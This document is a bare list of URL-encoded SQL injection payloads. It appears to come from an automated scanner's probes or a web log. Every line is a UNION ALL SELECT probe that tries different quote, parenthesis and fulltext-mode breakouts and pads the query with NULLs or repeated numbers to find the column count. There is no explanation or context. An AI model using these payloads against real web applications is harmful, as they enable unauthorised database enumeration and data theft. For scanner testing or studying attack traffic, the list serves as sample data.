1%27%20%2B%20%28SELECT%20%27lbvu%27%20FROM%20DUAL%20WHERE%204851%3D4851%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27WIGT%27%20FROM%20DUAL%20WHERE%202031%3D2031%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ekxJ%27%20FROM%20DUAL%20WHERE%209949%3D9949%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27mqrD%27%20WHERE%208954%3D8954%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ejOQ%27%20WHERE%208974%3D8974%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27BNLR%27%20WHERE%209140%3D9140%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27jOWJ%27%20WHERE%201760%3D1760%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27pGZd%27%20WHERE%208751%3D8751%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27AJRE%27%20WHERE%208167%3D8167%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27epak%27%20WHERE%207804%3D7804%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ymbq%27%20WHERE%209388%3D9388%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27SAOs%27%20WHERE%208033%3D8033%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27HZAM%27%20WHERE%205714%3D5714%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 -4116%29%20UNION%20ALL%20SELECT%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%23 -7415%29%20UNION%20ALL%20SELECT%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%23 -3222%29%20UNION%20ALL%20SELECT%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%23 -7654%29%20UNION%20ALL%20SELECT%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%2C%201459%23 -9239%29%20UNION%20ALL%20SELECT%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%2C%205882%23 -7833%29%20UNION%20ALL%20SELECT%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%23 -2174%29%20UNION%20ALL%20SELECT%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%23 -4700%29%20UNION%20ALL%20SELECT%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%23 -8832%29%20UNION%20ALL%20SELECT%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%23 -6694%29%20UNION%20ALL%20SELECT%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%2C%208512%23 -7064%27%29%20UNION%20ALL%20SELECT%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%23 -7749%27%29%20UNION%20ALL%20SELECT%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%2C%207609%23 -9179%27%29%20UNION%20ALL%20SELECT%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%23 -4184%27%29%20UNION%20ALL%20SELECT%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%23 -8793%27%29%20UNION%20ALL%20SELECT%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%2C%209968%23 -7056%27%29%20UNION%20ALL%20SELECT%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%23 -9632%27%29%20UNION%20ALL%20SELECT%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%23 